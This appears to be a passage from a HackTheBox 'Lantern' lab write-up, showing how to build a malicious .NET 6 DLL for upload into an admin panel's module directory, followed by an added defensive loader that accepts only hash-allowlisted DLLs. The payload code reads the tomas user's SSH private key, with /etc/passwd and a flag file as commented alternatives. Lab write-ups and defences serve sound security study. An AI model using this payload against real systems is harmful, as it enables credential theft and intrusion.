Malicious DLL
As discovered previously:
- the admin panel supports several modules through loaded DLLs located under the /opt/components directory
- the file upload feature can be leveraged to upload a malicious DLL
In the following section, I will generate a malicious DLL file with the dotnet 6.0 framework.
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ dotnet new classlib -n exploit
The template "Class Library" was created successfully.
Processing post-creation actions...
Running 'dotnet restore' on /home/kali/archive/htb/labs/lantern/exploit/exploit.csproj...
Determining projects to restore...
Restored /home/kali/archive/htb/labs/lantern/exploit/exploit.csproj (in 102 ms).
Restore succeeded.
Creating a new project named exploit
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ dotnet add exploit package Microsoft.AspNetCore.Components --version 6.0.0
Determining projects to restore...
Writing /tmp/tmpU7wcxb.tmp
info : X.509 certificate chain validation will use the fallback certificate bundle at '/usr/share/dotnet/sdk/6.0.400/trustedroots/codesignctl.pem'.
info : Adding PackageReference for package 'Microsoft.AspNetCore.Components' into project '/home/kali/archive/htb/labs/lantern/exploit/exploit.csproj'.
info : Restoring packages for /home/kali/archive/htb/labs/lantern/exploit/exploit.csproj...
info : Package 'Microsoft.AspNetCore.Components' is compatible with all the specified frameworks in project '/home/kali/archive/htb/labs/lantern/exploit/exploit.csproj'.
info : PackageReference for package 'Microsoft.AspNetCore.Components' version '6.0.0' added to file '/home/kali/archive/htb/labs/lantern/exploit/exploit.csproj'.
info : Generating MSBuild file /home/kali/archive/htb/labs/lantern/exploit/obj/exploit.csproj.nuget.g.targets.
info : Writing assets file to disk. Path: /home/kali/archive/htb/labs/lantern/exploit/obj/project.assets.json
log : Restored /home/kali/archive/htb/labs/lantern/exploit/exploit.csproj (in 104 ms).
Adding the ASP.NET Core component package, version 6.0, to the project
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ ll exploit
total 20K
4.0K drwxrwxr-x 2 kali kali 4.0K Aug 19 18:30 obj
4.0K -rw-rw-r-- 1 kali kali 330 Aug 19 18:30 exploit.csproj
4.0K drwxrwxr-x 3 kali kali 4.0K Aug 19 18:30 .
4.0K -rw-rw-r-- 1 kali kali 52 Aug 19 18:30 Class1.cs
4.0K drwxrwxr-x 4 kali kali 4.0K Aug 19 18:30 ..
The payload will go into the Class1.cs file
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;

namespace exploit
{
    public class Component : ComponentBase
    {
        protected override void BuildRenderTree(RenderTreeBuilder builder)
        {
            base.BuildRenderTree(builder);
            //string file = File.ReadAllText("/etc/passwd");
            //string file = File.ReadAllText("/home/tomas/user.txt");
            string file = File.ReadAllText("/home/tomas/.ssh/id_rsa");
            builder.AddContent(0, file);
        }
    }
}
This will read the SSH private key of the tomas user
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ dotnet build exploit -c Release
MSBuild version 17.3.0+92e077650 for .NET
Determining projects to restore...
All projects are up-to-date for restore.
exploit -> /home/kali/archive/htb/labs/lantern/exploit/bin/Release/net6.0/exploit.dll
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:01.75
Build complete. The payload is now ready for deployment.
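
A loader-side mitigation for the module loading described at the top of this section, as an added example (not code from the target application or from this write-up): a DLL under /opt/components is loaded only if its SHA-256 digest is on an allowlist of reviewed modules. The class name, method name and the allowlist entry are hypothetical; the directory is the one named above.

```csharp
// Added example: hash-allowlisted module loading for a .NET 6 host.
// ComponentLoader / LoadApproved are hypothetical names, not the application's API.
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;

public static class ComponentLoader
{
    // Module directory as named in the write-up.
    private const string ComponentDir = "/opt/components";

    // SHA-256 digests (hex) of modules reviewed at deploy time.
    // The entry below is a placeholder, not a real digest.
    private static readonly HashSet<string> Approved = new(StringComparer.OrdinalIgnoreCase)
    {
        "<SHA256-OF-REVIEWED-MODULE>",
    };

    public static Assembly LoadApproved(string moduleName)
    {
        // Accept only a bare file name: no directory separators, no "..".
        if (string.IsNullOrEmpty(moduleName)
            || moduleName != Path.GetFileName(moduleName)
            || moduleName.Contains(".."))
            throw new ArgumentException("invalid module name", nameof(moduleName));

        // Resolve the path and confirm it still sits inside the module directory.
        string path = Path.GetFullPath(Path.Combine(ComponentDir, moduleName + ".dll"));
        if (!path.StartsWith(ComponentDir + Path.DirectorySeparatorChar, StringComparison.Ordinal))
            throw new UnauthorizedAccessException("module path escapes the component directory");

        // Read once, hash those bytes, and load the same bytes, so the file
        // cannot be swapped between the check and the load.
        byte[] image = File.ReadAllBytes(path);
        string digest = Convert.ToHexString(SHA256.HashData(image));
        if (!Approved.Contains(digest))
            throw new UnauthorizedAccessException(
                $"unapproved module '{moduleName}' (sha256 {digest})");

        return Assembly.Load(image);
    }
}
```

The rejection message carries the digest of the refused file, so a logged exception doubles as a detection event for an unexpected DLL appearing in the module directory.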